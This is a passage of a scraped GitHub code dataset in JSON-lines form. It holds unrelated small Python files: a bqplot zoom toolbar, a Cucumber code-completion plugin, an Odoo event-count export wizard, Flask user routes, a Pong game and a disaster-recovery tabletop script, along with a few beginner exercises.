undo_redo(*args):\n self.curr_action = args[0]\n (x1, x2), (y1, y2) = args[1][-1]\n with self.scale_x.hold_trait_notifications():\n with self.scale_y.hold_trait_notifications():\n self.scale_x.min, self.scale_x.max = x1, x2\n self.scale_y.min, self.scale_y.max = y1, y2\n self.undo_btn.on_event('click', lambda *ignore: undo_redo(Action.undo, self.undo_actions))\n self.redo_btn.on_event('click', lambda *ignore: undo_redo(Action.redo, self.redo_actions))\n\n\n\n control_lyt = widgets.Layout(width='100px')\n self.control_x = widgets.Checkbox(value=False,description='Lock X Axis',indent=False, layout=control_lyt)\n self.control_y = widgets.Checkbox(value=False,description='Lock Y Axis',indent=False, layout=control_lyt)\n def axis_lock_update(checkbox):\n ####### Only allows one checkbox to be locked at a time ######\n if checkbox['owner'].description == self.control_x.description:\n if self.control_y.value:\n self.control_y.value = False\n\n if checkbox['owner'].description == self.control_y.description:\n if self.control_x.value:\n self.control_x.value = False\n ##############################################################\n # When a axis checkbox is locked.\n # Updates the panzoom tool to lock eithier the x or y axis.\n # Also updates the zoombrush tool to use relevant zoom brush\n if self.control_x.value:\n if self.control_y.value:\n self.panzoom = bqplot.PanZoom()\n self.zoom_brush = self.zoom_brush_none\n else:\n self.panzoom = bqplot.PanZoom(scales={'y': [self.scale_y]})\n self.zoom_brush = self.zoom_brush_vertical\n else:\n if self.control_y.value:\n self.panzoom = bqplot.PanZoom(scales={'x': [self.scale_x]})\n self.zoom_brush = self.zoom_brush_horizontal\n else:\n self.panzoom = bqplot.PanZoom(scales={'x': [self.scale_x], 'y': [self.scale_y]})\n self.zoom_brush = self.zoom_brush_full\n\n tool_actions_map[PAN_ZOOM] = self.panzoom\n tool_actions_map[ZOOM_SELECT] = self.zoom_brush\n\n # Update immediately if in PAN_ZOOM mode\n name = self.tool_actions[self.interaction_tooltips.v_model]\n if name == PAN_ZOOM:\n self.figure.interaction = self.panzoom\n elif name == ZOOM_SELECT:\n self.figure.interaction = self.zoom_brush\n \n\n self.control_x.observe(axis_lock_update)\n self.control_y.observe(axis_lock_update)\n self.axis_controls = widgets.VBox([self.control_x,self.control_y])\n\n self.tooltips = v.Row(children=[\n self.axis_controls, \n self.interaction_tooltips, \n self.reset_tooltip,\n self.undo_tooltip,\n self.redo_tooltip,\n self.screenshot_tooltip\n ], align='center', justify='center')\n self.plot.add_to_toolbar(self.tooltips)\n\n def get_df_selection(self, x1, x2, y1, y2):\n ind = self.plot.x_col\n addr = self.plot.y_col\n df = self.dataset\n return df[(df[ind] >= x1) & (df[ind] <= x2) & (df[addr] >= y1) & (df[addr] <= y2)]\n\n def update_zoom_brush_full(self, *args):\n with self.output:\n if not self.zoom_brush.brushing: # Update on mouse up\n self.figure.interaction = None\n if self.zoom_brush.selected is not None:\n (x1, y1), (x2, y2) = self.zoom_brush.selected\n if not self.zoom_brush.brushing: # Update on mouse up\n self.figure.interaction = self.zoom_brush\n with self.zoom_brush.hold_trait_notifications(): # Delete selection\n self.zoom_brush.selected_x = None\n self.zoom_brush.selected_y = None\n\n self.zoom_sel(x1, x2, y1, y2, smart_zoom=True, padding=True)\n\n def update_zoom_brush_horizontal(self, *args):\n with self.output:\n if not self.zoom_brush.brushing: # Update on mouse up\n self.figure.interaction = None\n if self.zoom_brush.selected is not None:\n (x1, x2) = self.zoom_brush.selected\n if not self.zoom_brush.brushing: # Update on mouse up\n self.figure.interaction = self.zoom_brush\n with self.zoom_brush.hold_trait_notifications(): # Delete selection\n self.zoom_brush.selected = None\n\n self.zoom_sel(x1, x2, None, None, smart_zoom=False, padding=False)\n\n def update_zoom_brush_vertical(self, *args):\n with self.output:\n if not self.zoom_brush.brushing: # Update on mouse up\n self.figure.interaction = None\n if self.zoom_brush.selected is not None:\n (y1, y2) = self.zoom_brush.selected\n if not self.zoom_brush.brushing: # Update on mouse up\n self.figure.interaction = self.zoom_brush\n with self.zoom_brush.hold_trait_notifications(): # Delete selection\n self.zoom_brush.selected = None\n self.zoom_sel(None, None, y1, y2, smart_zoom=False, padding=False)\n\n def measure_selected_area(self, *args):\n with self.output:\n if not self.ruler.brushing: # Update on mouse up\n pass\n if self.ruler.selected is not None:\n (x1, y1), (x2, y2) = self.ruler.selected\n if not self.ruler.brushing: # Update on mouse up\n self.figure.interaction = self.ruler\n with self.ruler.hold_trait_notifications(): # Delete selection\n self.ruler.selected_x = None\n self.ruler.selected_y = None\n df = self.get_df_selection(x1, x2, y1, y2)\n\n uniqueCacheLines = {l >> int(np.log2(self.plot.model.curr_trace.cache_block)) for l in df.unique('Address')}\n self.plot.model.legend.mearsurement.update(y2-y1, len(uniqueCacheLines), df.count(), df)\n \n\n def update_zoom_brush_none(self, *args):\n with self.zoom_brush.hold_trait_notifications(): # Delete selection\n self.zoom_brush.selected = None\n\n def zoom_sel(self, x1, x2, y1, y2, smart_zoom=False, padding=False):\n #################### handle locked x or y axis ########################\n # dont zoom if both axes are locked\n if self.control_x.value == True and self.control_y.value == True:\n return\n # if either x axis or y axis is locked, set the coresponding x12 or y12 coords to\n # the current axis size so it doesn't zoom \n if self.control_x.value == True:\n smart_zoom = False\n padding = False\n x1 = self.scale_x.min\n x2 = self.scale_x.max\n if self.control_y.value == True:\n smart_zoom = False\n padding = False\n y1 = self.scale_y.min\n y2 = self.scale_y.max\n ####################################################################### \n\n df = self.get_df_selection(x1, x2, y1, y2)\n\n if df.count() != 0:\n selection = self.plot.model.legend.get_select_string()\n if selection != \"\":\n df = df[df[selection]]\n\n if df.count() == 0:\n self.stuck_ctr+=1\n with self.output:\n self.output.clear_output()\n print(f\"{WARNING_LABEL} {TextStyle.YELLOW}No accesses in selection{'!'*self.stuck_ctr}{TextStyle.END}\")\n return\n\n if smart_zoom: # For reset and zoom to selection\n ind = self.plot.x_col\n addr = self.plot.y_col\n x1 = df[ind].values[0]\n x2 = df[ind].values[-1]+1 # To fix resets on single values + to match original limits\n y1 = df[addr].min()[()]\n y2 = df[addr].max()[()]+1\n\n\n if padding: # Fix for plot getting stuck at one value axis\n if (x2 - x1 < 128):\n x1 -= (128 + x1 - x2) / 2\n x2 = x1 + 128\n\n if (y2 - y1 < 128):\n y1 -= (128 + y1 - y2) / 2\n y2 = y1 + 128\n \n # Add a 5% padding so points are not directly on edge\n padding_x = (x2 - x1) * 0.05\n padding_y = (y2 - y1) * 0.05\n\n x1 = x1 - padding_x\n x2 = x2 + padding_x\n y1 = y1 - padding_y\n y2 = y2 + padding_y\n\n with self.scale_x.hold_trait_notifications():\n self.scale_x.min, self.scale_x.max = float(x1), float(x2)\n with self.scale_y.hold_trait_notifications():\n self.scale_y.min, self.scale_y.max = float(y1), float(y2)\n\n def click_to_zoom(self, _, target):\n '''\n click to zoom call back \n target contains mouse coordinates\n '''\n # check whether we want to zoom in or out\n tool_name = self.tool_actions[self.interaction_tooltips.v_model]\n if tool_name == CLICK_ZOOM_IN:\n scale = CLICK_ZOOM_SCALE\n use_smart_zoom = True\n use_padding = True\n elif tool_name == CLICK_ZOOM_OUT:\n scale = CLICK_ZOOM_SCALE * 100\n use_smart_zoom = False\n use_padding = False\n else:\n print('Invalid Tool Selected')\n return\n\n\n # get the mouse coordinates\n x = target['data']['click_x']\n y = target['data']['click_y']\n\n # difference smallest and largest value on each axis\n x_diff = abs(self.scale_x.max - self.scale_x.min)\n y_diff = abs(self.scale_y.max - self.scale_y.min)\n # multiply diff by CLICK_ZOOM_SCALE for 10x zoom, and by 0.5 since we want to\n # create a box around the x y mouse coord.\n x1 = x - (0.5 * scale * x_diff)\n x2 = x + (0.5 * scale * x_diff)\n y1 = y - (0.5 * scale * y_diff)\n y2 = y + (0.5 * scale * y_diff)\n\n self.zoom_sel(float(x1), float(x2), float(y1), float(y2),\n smart_zoom=use_smart_zoom, padding=use_padding) \n\n def zoom_args_string(self):\n to_int = [tuple( map(int,i) ) for i in self.limits]\n return f'zoom_access={to_int[0]}, zoom_address={to_int[1]}'\n","repo_name":"NVSL/CSE141pp-Tool-Moneta","sub_path":"moneta/moneta/vaextended/bqplot.py","file_name":"bqplot.py","file_ext":"py","file_size_in_byte":26107,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"34"} +{"seq_id":"17282018735","text":"import os\nimport csv\n\ndef create_annotation():\n \n '''\n Функция, которая создает аннотации(annotations.csv) для dataset\n '''\n\n dataset_path = os.path.abspath(\"dataset\")\n\n with open('annotations.csv', 'w') as file:\n writer = csv.writer(file)\n for root, dirs, files in os.walk(dataset_path):\n for filename in files:\n absolute_path = os.path.abspath(os.path.join(root, filename))\n relative_path = os.path.relpath(absolute_path)\n class_name = os.path.basename(os.path.dirname(absolute_path))\n writer.writerow([absolute_path, relative_path, class_name])\n \n\n\ndef main():\n create_annotation()\n\nif __name__ == \"__main__\":\n main()","repo_name":"Amirprogrammer689/PP-v5","sub_path":"create_annotation.py","file_name":"create_annotation.py","file_ext":"py","file_size_in_byte":764,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"34"} +{"seq_id":"1188464180","text":"palabra = input(\"Ingrese una palabra: \")\n\npalindromo = palabra[::-1]\nvalidador = 0\n\nfor letra1,letra2 in zip(palabra,palindromo):\n if letra1 != letra2:\n validador = 1\n break\nif validador == 0:\n print(\"La palabra es un palindromo\")\nelse:\n print(\"La palabra no es un palindromo\")\n","repo_name":"lmoreno98/100DaysOfCode","sub_path":"Python_Practice_guide/Tuple_List/Ejercicio8.py","file_name":"Ejercicio8.py","file_ext":"py","file_size_in_byte":301,"program_lang":"python","lang":"es","doc_type":"code","stars":0,"dataset":"github-code","pt":"34"} +{"seq_id":"72914397536","text":"#!/usr/bin/env python\n################################################################################\n# Cucumber support for codeintel.\n################################################################################\nimport os\nimport sys\nimport logging\n\nfrom codeintel2.common import *\nfrom codeintel2.citadel import CitadelBuffer\nfrom codeintel2.langintel import LangIntel\nfrom codeintel2.udl import UDLBuffer, UDLCILEDriver, UDLLexer\nfrom codeintel2.util import CompareNPunctLast\n\nfrom SilverCity.ScintillaConstants import (\n SCE_UDL_SSL_DEFAULT, SCE_UDL_SSL_IDENTIFIER,\n SCE_UDL_SSL_OPERATOR, SCE_UDL_SSL_VARIABLE, SCE_UDL_SSL_WORD,\n)\n\ntry:\n from xpcom.server import UnwrapObject\n _xpcom_ = True\nexcept ImportError:\n _xpcom_ = False\n################################################################################\nlang = \"Cucumber\"\nlog = logging.getLogger(\"codeintel.cucumber\")\n#log.setLevel(logging.DEBUG)\n\n# These keywords are copied from \"cucumber-mainlex.udl\"\n# ** Be sure to keep both of them in sync. **\nkeywords = [\n 'Feature:', 'Background:', 'Scenario:', 'Scenario Outline:', 'Given', 'When',\n 'Then', 'And', 'But', 'Examples:', '*'\n]\n################################################################################\nclass CucumberLexer(UDLLexer):\n lang = lang\n################################################################################\nclass CucumberLangIntel(LangIntel):\n lang = lang\n \n ############################################################################\n # IMPLICIT codeintel triggering event, i.e. when typing in the editor.\n #\n # @param buf {components.interfaces.koICodeIntelBuffer}\n # @param pos {int} The cursor position in the editor/text.\n # @param implicit {bool} Automatically called, else manually called?\n ############################################################################\n def trg_from_pos(self, buf, pos, implicit=True, DEBUG=False, ac=None):\n if pos < 1:\n return None\n\n accessor = buf.accessor\n last_pos = pos-1\n char = accessor.char_at_pos(last_pos)\n style = accessor.style_at_pos(last_pos)\n if char == '@':\n return Trigger(self.lang, TRG_FORM_CPLN, \"tags\", pos, implicit)\n elif char == '<':\n return Trigger(self.lang, TRG_FORM_CPLN, \"placeholders\", pos-1, implicit)\n elif char.isupper():\n prefix = char\n for word in keywords:\n if word.startswith(prefix):\n return Trigger(self.lang, TRG_FORM_CPLN, \"keywords\",\n pos-1, implicit, kw_prefix=prefix)\n\n return None\n ############################################################################\n # EXPLICIT triggering event, i.e. Ctrl+J.\n #\n # @param buf {components.interfaces.koICodeIntelBuffer}\n # @param pos {int} The cursor position in the editor/text.\n # @param implicit {bool} Automatically called, else manually called?\n ############################################################################\n def preceding_trg_from_pos(self, buf, pos, curr_pos,\n preceding_trg_terminators=None, DEBUG=False):\n if pos < 1:\n return None\n\n accessor = buf.accessor\n last_pos = pos-1\n char = accessor.char_at_pos(last_pos)\n style = accessor.style_at_pos(last_pos)\n if char == '@':\n return Trigger(self.lang, TRG_FORM_CPLN, \"tags\", pos, implicit=False)\n elif char == '<':\n return Trigger(self.lang, TRG_FORM_CPLN, \"placeholders\",\n pos-1, implicit=False)\n elif char.isupper():\n prefix = char\n for word in keywords:\n if word.startswith(prefix):\n return Trigger(self.lang, TRG_FORM_CPLN, \"keywords\",\n pos-1, implicit=False, kw_prefix=prefix)\n\n return None\n ############################################################################\n # Provide the list of completions or the calltip string.\n # Completions are a list of tuple (type, name) items.\n #\n # Note: This example is *not* asynchronous.\n ############################################################################\n def async_eval_at_trg(self, buf, trg, ctlr):\n if _xpcom_:\n trg = UnwrapObject(trg)\n ctlr = UnwrapObject(ctlr)\n pos = trg.pos\n ctlr.start(buf, trg)\n\n if trg.id == (self.lang, TRG_FORM_CPLN, \"placeholders\"):\n ctlr.set_cplns(self._get_all_placeholders_in_buffer(buf, pos))\n ctlr.done(\"success\")\n return\n \n if trg.id == (self.lang, TRG_FORM_CPLN, \"tags\"):\n ctlr.set_cplns(self._get_all_tags_in_buffer(buf, pos))\n ctlr.done(\"success\")\n return\n\n if trg.id == (self.lang, TRG_FORM_CPLN, \"keywords\"):\n kw_prefix = trg.extra.get(\"kw_prefix\")\n cplns = [x for x in keywords if x.startswith(kw_prefix)]\n cplns = [(\"keyword\", x) for x in sorted(cplns, cmp=CompareNPunctLast)]\n ctlr.set_cplns(cplns)\n ctlr.done(\"success\")\n return\n\n ctlr.error(\"Unknown trigger type: %r\" % (trg, ))\n ctlr.done(\"error\")\n ############################################################################\n def _get_all_placeholders_in_buffer(self, buf, pos):\n all_placeholders = set()\n for token in buf.accessor.gen_tokens():\n if token.get('start_index') == pos: continue\n if token.get('text')[0] == '<':\n all_placeholders.add(token.get('text'))\n return [(\"variable\", x) for x in sorted(all_placeholders, cmp=CompareNPunctLast)]\n ############################################################################\n def _get_all_tags_in_buffer(self, buf, pos):\n all_tags = set()\n for token in buf.accessor.gen_tokens():\n if token.get('start_index') == pos-1: continue\n if token.get('text')[0] == '@':\n all_tags.add(token.get('text')[1:])\n return [(\"identifier\", x) for x in sorted(all_tags, cmp=CompareNPunctLast)]\n################################################################################\nclass CucumberBuffer(UDLBuffer):\n lang = lang\n ssl_lang = \"Cucumber\"\n\n cb_show_if_empty = True\n\n # Close the completion dialog when encountering any of these chars.\n cpln_stop_chars = \" ()*-=+<>{}[]^&|;:'\\\",.?~`!@#%\\\\/\"\n################################################################################\nclass CucumberCILEDriver(UDLCILEDriver):\n lang = lang\n\n def scan_purelang(self, buf):\n import cile_cucumber\n return cile_cucumber.scan_buf(buf)\n################################################################################\ndef register(mgr):\n \"\"\"Register language support with the Manager.\"\"\"\n mgr.set_lang_info(\n lang,\n silvercity_lexer=CucumberLexer(),\n buf_class=CucumberBuffer,\n langintel_class=CucumberLangIntel,\n import_handler_class=None,\n cile_driver_class=CucumberCILEDriver,\n # Dev Note: set to false if this language does not support\n # autocomplete/calltips.\n is_cpln_lang=True)\n","repo_name":"ccaroon/cucumber_language","sub_path":"pylib/codeintel_cucumber.py","file_name":"codeintel_cucumber.py","file_ext":"py","file_size_in_byte":7282,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"34"} +{"seq_id":"74664486178","text":"a = int(input())\r\nb = int(input())\r\nc = int(input())\r\n\r\nif (c < 0):\r\n print ('NO SOLUTION')\r\nelse:\r\n c *= c\r\n c -= b\r\n if (a == 0 and c == 0):\r\n print('MANY SOLUTIONS')\r\n elif (a == 0 and c != 0):\r\n print ('NO SOLUTION')\r\n elif (c % a == 0):\r\n print(c // a)\r\n else:\r\n print('NO SOLUTION')\r\n","repo_name":"dashkazaitseva/yandex.traning","sub_path":"2 июня. Тестирование/D.py","file_name":"D.py","file_ext":"py","file_size_in_byte":339,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"34"} +{"seq_id":"1346434564","text":"from turtle import Turtle\nfrom random import randint\nBALL_COLOR = 'white'\nMAX_MIN_WIDTH = 400\nMAX_MIN_HEIGHT = 300\nrandheading = randint(0, 360)\n\n\nclass Ball(Turtle):\n def __init__(self):\n super(Ball, self).__init__()\n self.create_middle_line()\n self.color(BALL_COLOR)\n self.shape('circle')\n self.penup()\n\n def ball_move(self, paddle1, paddle2):\n global randheading\n if self.pos()[1] >= MAX_MIN_HEIGHT or self.pos()[1] <= -MAX_MIN_HEIGHT:\n randheading = -randheading\n self.setheading(randheading)\n if paddle1.distance(self) < 51 and self.pos()[0] <= 360:\n randheading = -randheading\n self.setheading(randheading)\n elif paddle2.distance(self) < 51 and self.pos()[0] > -360:\n randheading = -randheading\n self.setheading(randheading)\n else:\n self.setheading(randheading)\n self.fd(20)\n\n def bounce_x(self):\n self.setposition(-self.xcor(), self.ycor())\n\n def create_middle_line(self):\n line = Turtle()\n line.hideturtle()\n line.penup()\n line.color(BALL_COLOR)\n line.goto(0, 300)\n line.setheading(270)\n line.pendown()\n while line.pos()[1] >= -300:\n line.fd(20)\n line.penup()\n line.fd(20)\n line.pendown()\n\n","repo_name":"BinayT/Python100DOC","sub_path":"Day-22-Pong/PongGame/ball.py","file_name":"ball.py","file_ext":"py","file_size_in_byte":1371,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"34"} +{"seq_id":"22347538943","text":"import time\nimport datetime\nimport base64\nfrom xlwt import *\n\nfrom openerp import tools\nfrom openerp import models, fields, api, _\n\nclass extract_site_count(models.TransientModel):\n _name = 'extract.site.count'\n \n from_count = fields.Date(string='From', required=True)\n to = fields.Date(string='To', required=True)\n user_id = fields.Many2one('res.users', string='Site User', required=True)\n \n @api.multi\n def get_file(self):\n obj_event = self.env['event.event']\n obj_registration = self.env['event.registration']\n\n wb1 = Workbook()\n ws1 = wb1.add_sheet('Count of Site Registrations by Event')\n ws1.write(0, 0, 'event_id')\n ws1.write(0, 1, 'event_name')\n ws1.write(0, 2, 'count_site')\n ws1.write(0, 3, 'count_total')\n line = 1\n\n # extract all events between the two given dates\n events = obj_event.search([('date_begin', '>=', self.from_count), ('date_begin', '<=', self.to)])\n if events:\n# events = obj_event.browse(event_ids)\n sentence = \"\"\"SELECT count(event_id), event_id\n FROM event_registration as reg, crm_case as crm \n WHERE reg.event_id in (%s) \n AND (crm.state = 'open' OR crm.state = 'done')\n AND reg.create_uid = %s\n AND reg.case_id = crm.id\n GROUP BY event_id\"\"\" % (','.join([str(x.id) for x in events]),\n str(data['form']['user_id']))\n self.env.cr.execute(sentence)\n count_site = {}\n count_total = {}\n for event_id in events:\n count_site[event_id.id] = 0\n count_total[event_id.id] = 0\n res = self.env.cr.fetchall()\n for count in res:\n count_site[count[1]] = count[0]\n sentence = \"\"\"SELECT count(event_id), event_id\n FROM event_registration as reg, crm_case as crm \n WHERE reg.event_id in (%s) \n AND (crm.state = 'open' OR crm.state = 'done')\n AND reg.case_id = crm.id\n GROUP BY event_id\"\"\" % (','.join([str(x) for x in events.ids]))\n self.env.cr.execute(sentence)\n res = self.env.cr.fetchall()\n for count in res:\n count_total[count[1]] = count[0]\n for event in events:\n ws1.write(line, 0, event.id)\n ws1.write(line, 1, event.name or 'inconnu')\n ws1.write(line, 2, count_site[event.id])\n ws1.write(line, 3, count_total[event.id])\n line += 1\n wb1.save('site_counting.xls')\n result_file = open('site_counting.xls', 'rb').read()\n\n # give the result to the user\n msg = 'Save the File with '\".xls\"' extension.'\n site_counting_xls = base64.encodestring(result_file)\n else:\n wb1.save('site_counting.xls')\n result_file = open('site_counting.xls', 'rb').read()\n msg = 'No events between these two dates.'\n site_counting_xls = base64.encodestring(result_file)\n \n ctx = self.env.context.copy()\n ctx.update({'msg': msg, 'site_counting_xls': site_counting_xls, 'name': 'site_counting.xls'})\n \n resource = self.env.ref('cci_event_extend.cci_extract_site_count_msg_view')\n return {\n 'name': 'Notification',\n 'view_type': 'form',\n 'view_mode': 'form',\n 'res_model': 'extract.site.count.msg',\n 'views': [(resource.id, 'form')],\n 'context': ctx,\n 'type': 'ir.actions.act_window',\n 'target': 'new',\n }\n\nclass extract_site_count_msg(models.TransientModel):\n _name = 'extract.site.count.msg'\n \n name = fields.Char('Name')\n msg = fields.Text('File created', size=100, readonly=True)\n site_counting_xls = fields.Binary('Prepared file', readonly=True)\n \n @api.model\n def default_get(self, fields):\n res = super(extract_site_count_msg, self).default_get(fields)\n if 'name' in self.env.context:\n res.update({'name': self.env.context['name']})\n if 'msg' in self.env.context:\n res.update({'msg': self.env.context['msg']})\n if 'site_counting_xls' in self.env.context:\n res.update({'site_counting_xls': self.env.context['site_counting_xls']})\n return res\n \n","repo_name":"philmervdm/modules_cci_odoo8","sub_path":"cci_event_extend/wizard/extract_site_count.py","file_name":"extract_site_count.py","file_ext":"py","file_size_in_byte":4650,"program_lang":"python","lang":"en","doc_type":"code","stars":2,"dataset":"github-code","pt":"34"} +{"seq_id":"21633158288","text":"from flask import Blueprint, render_template, jsonify, request, send_from_directory, redirect, url_for\n\nfrom flask_jwt import jwt_required, current_identity\nfrom flask import Flask,flash\nfrom flask_login import LoginManager, current_user, login_required\nfrom datetime import datetime\n \nfrom App.models import *\n\nfrom App.controllers import *\n\nuser_views = Blueprint('user_views', __name__, template_folder='../templates')\n\n\n@user_views.route('/users', methods=['GET'])\ndef get_current_user():\n return jsonify(\n {\n \"userId\" : current_user.id,\n \"username\": current_user.username,\n }\n )\n\n\n# for UI\n@user_views.route('/allUsers', methods=['GET'])\ndef get_user_page():\n users = get_all_users()\n return render_template('users.html', users=users)\n\n@user_views.route('/api/profile', methods=['GET'])\ndef view_profile():\n return render_template('profile.html',user=current_user)\n\n\n\n@user_views.route('/api/profile/', methods=['GET'])\ndef view_profile_from_id(userID):\n user = get_user(userID)\n return render_template('profile.html',user=user)\n\n\n\n@user_views.route('/api/users', methods=['POST'])\n@jwt_required()\ndef create_user_action():\n data = request.json\n user = getUserbyUsername(data['username'])\n if user:\n return jsonify({\"message\":\"Username Already Taken\"}), 400\n user = create_user(data[\"username\"], data[\"password\"])\n if user:\n distribute_all()\n return jsonify({\"message\": \"User Created\"}), 201\n return jsonify({\"message\":\"User not Created\"}), 400\n\n@user_views.route('/api/users', methods=['GET'])\n@jwt_required()\ndef get_all_users_action():\n users = get_all_users_json()\n if users:\n return jsonify(users), 200\n return jsonify({\"message\": \"There were no users found.\"}), 404\n\n@user_views.route('/api/users/', methods=['GET'])\n@jwt_required()\ndef get_user_action():\n user = get_user(id)\n if user:\n return jsonify(get_user_json(id)),200\n return jsonify({\"message\":\"User Not Found\"}), 404\n\n@user_views.route('/api/users//info', methods=['GET'])\n@jwt_required()\ndef get_user_details_action():\n user = get_user(id)\n if user:\n details = {\n \"id\": user.getId(),\n \"username\": user.getUsername(),\n \"images\": getImagesByUser_JSON(user.getId()),\n \"average_rate\": get_average_rate_by_ratee(user.getId()),\n \"ratings_completed\": get_ratings_by_ratee_json(user.getId())\n }\n return jsonify(details),200\n return jsonify({\"message\":\"User Not Found\"}), 404\n\n\n@user_views.route('/api/users/', methods=['DELETE'])\n@jwt_required()\ndef delete_user_action(id):\n user = get_user(id)\n if user:\n delete_user(id)\n return jsonify({\"message\":\"User Deleted\"}) , 200\n return jsonify({\"message\":\"User Not Found\"}) , 404\n\n#login routes\n@user_views.route('/login',methods=['GET'])\ndef getLoginPage():\n return render_template('login.html')\n\n@user_views.route('/login',methods=['POST'])\ndef loginAction():\n data=request.form\n permittedUser=authenticate(data['username'], data['password'])\n if permittedUser==None:\n flash(\"Wrong Credentials, Please try again\")\n return render_template('login.html')\n login_user(permittedUser,remember=True)\n flash('You were successfully logged in!')\n return render_template('profile.html',user=current_user)\n\n#signup routes\n@user_views.route('/signup',methods=['GET'])\ndef getSignUpPage():\n return render_template('signup.html')\n\n@user_views.route('/signup',methods=['POST'])\ndef signupAction():\n data = request.form\n user = getUserbyUsername(data['username'])\n if user:\n flash(\"Username taken please try a new username\")\n return render_template('signup.html')\n user = create_user(data['username'], data['password'])\n return render_template('login.html')\n\n#route for viewing a user's profile\n@user_views.route('/viewUserProfile/', methods=['GET'])\n@login_required\ndef viewProfile(userId):\n user=get_user(userId)\n result = view_feed(current_user.id, userId)\n images=get_images_by_userid(userId)\n images = [image.toJSON() for image in images]\n values=get_user_image_count(userId)\n total_rating=get_calculated_rating(userId)\n if user:\n return render_template('profilePage.html',user=user,images=images,rating_info=total_rating,values=values)\n return redirect(url_for('distributer_views.view_profiles_again'))\n","repo_name":"theWebWizards/profilepictureranking","sub_path":"App/views/user.py","file_name":"user.py","file_ext":"py","file_size_in_byte":4477,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"34"} +{"seq_id":"7480032550","text":"import pandas as pd\n\n# Define the graph structure as a list of tuples\nsteps = [\n ('A', 'Set the DRP into motion after a disaster has been declared'),\n ('B', 'Determine the magnitude of the disaster'),\n ('C', 'Determine what systems and processes have been affected by the disaster'),\n ('D', 'Communicate the disaster to the other disaster recovery team members'),\n ('E', 'Determine what first steps need to be taken by the disaster recovery teams'),\n ('F', 'Keep the disaster recovery teams on track with pre-determined expectations and goals'),\n ('G', 'Keep a record of money spent during the disaster recovery process'),\n ('H', 'Ensure that all decisions made abide by the DRP and policies set by the company'),\n ('I', 'Ensure that the secondary site is fully functional and secure'),\n ('J', 'Create a detailed report of all the steps undertaken in the disaster recovery process'),\n ('K', 'Notify the relevant parties once the disaster is over and normal business functionality has been restored')\n]\n\n# Create a Pandas DataFrame from the graph structure\nsteps_df = pd.DataFrame(steps, columns=['Task ID', 'Task Description'])\n\n# Define the graph structure as a list of tuples\nfunctions = [\n ('A', 'Disaster identification and declaration', 'B', 'Disaster Recovery Policy DRP activation'),\n ('B', 'Disaster Recovery Policy DRP activation', 'C', 'Assessment of damage'),\n ('C', 'Assessment of damage', 'D', 'Establish IT operations'),\n ('D', 'Establish IT operations', 'E', 'Failover Site activation'),\n ('E', 'Failover Site activation', 'F', 'Communicating the disaster'),\n ('F', 'Communicating the disaster', 'Fa', 'Internal Client Communication'),\n ('F', 'Communicating the disaster', 'Fb', 'Communication with media including social networks')\n]\n\n# Create a Pandas DataFrame from the graph structure\nfunctions_df = pd.DataFrame(functions, columns=['From Node', 'From Description', 'To Node', 'To Description'])\n\n\nimport pandas as pd\n\n# Define the graph structure as a list of tuples\nroles = [\n ('A', 'Facilitator', 'B', 'Exercise Participants'),\n ('B', 'Exercise Participants', 'C', 'IT Team'),\n ('B', 'Exercise Participants', 'D', 'Management'),\n ('E', 'System Failure', 'F', 'Detection'),\n ('F', 'Detection', 'G', 'Assessment?'),\n ('G', 'Assessment?', 'H', 'Resolution? (Yes)'),\n ('G', 'Assessment?', 'I', 'Communication (No)'),\n ('I', 'Communication (No)', 'F', 'Detection (Loop)'),\n ('H', 'Resolution? (Yes)', 'J', 'Recovery (Yes)'),\n ('H', 'Resolution? (Yes)', 'K', 'Communication (No)'),\n ('K', 'Communication (No)', 'F', 'Detection (Loop)'),\n ('J', 'Recovery (Yes)', 'L', 'After-Action Review'),\n ('M', 'Incident Report', 'N', 'Timeline'),\n ('M', 'Incident Report', 'O', 'Logs'),\n ('O', 'Logs', 'P', 'Anomalies Detected?'),\n ('P', 'Anomalies Detected?', 'Q', 'Root Cause Analysis (Yes)'),\n ('P', 'Anomalies Detected?', 'R', 'Communication (No)'),\n ('S', 'Internal', 'T', 'External'),\n ('T', 'External', 'U', 'Public Disclosure?'),\n ('U', 'Public Disclosure?', 'V', 'PR Response (Yes)'),\n ('U', 'Public Disclosure?', 'W', 'Legal (No)'),\n ('X', 'Evaluation', 'Y', 'Lessons Learned'),\n ('Y', 'Lessons Learned', 'Z', 'Improvements'),\n ('C', 'IT Team', 'E', 'System Failure'),\n ('D', 'Management', 'I', 'Communication'),\n ('I', 'Communication', 'K', 'Communication'),\n ('J', 'Recovery', 'X', 'Evaluation'),\n ('N', 'Timeline', 'R', 'Communication'),\n ('R', 'Communication', 'S', 'Internal'),\n ('Z', 'Improvements', 'C', 'IT Team')\n]\n\n# Create a Pandas DataFrame from the graph structure\nroles_df = pd.DataFrame(roles, columns=['From Node', 'From Description', 'To Node', 'To Description'])\n\n\n# Function to filter and display a DataFrame\ndef filter_and_display(df):\n while True:\n print(\"\\nFilter Options:\")\n print(\"1. Filter by column value\")\n print(\"2. Exit\")\n choice = input(\"Enter your choice: \")\n\n if choice == '1':\n print(\"\\nAvailable columns:\")\n for col in df.columns:\n print(col)\n column_name = input(\"Enter the column name to filter: \")\n filter_value = input(\"Enter the filter value: \")\n filtered_df = df[df[column_name] == filter_value]\n print(\"\\nFiltered DataFrame:\")\n print(filtered_df)\n elif choice == '2':\n break\n else:\n print(\"Invalid choice. Please select a valid option.\")\n\n# Allow the user to choose which DataFrame to filter\nwhile True:\n print(\"\\nChoose a DataFrame to filter:\")\n print(\"1. Steps\")\n print(\"2. Functions\")\n print(\"3. Roles\")\n print(\"4. Exit\")\n data_frame_choice = input(\"Enter your choice: \")\n\n if data_frame_choice == '1':\n filter_and_display(steps_df)\n elif data_frame_choice == '2':\n filter_and_display(functions_df)\n elif data_frame_choice == '3':\n filter_and_display(roles_df)\n elif data_frame_choice == '4':\n break\n else:\n print(\"Invalid choice. Please select a valid option.\")\n\n\n\n\n\n\n","repo_name":"green-dino/TTX","sub_path":"utils/disaster_recovery.py","file_name":"disaster_recovery.py","file_ext":"py","file_size_in_byte":5105,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"34"} 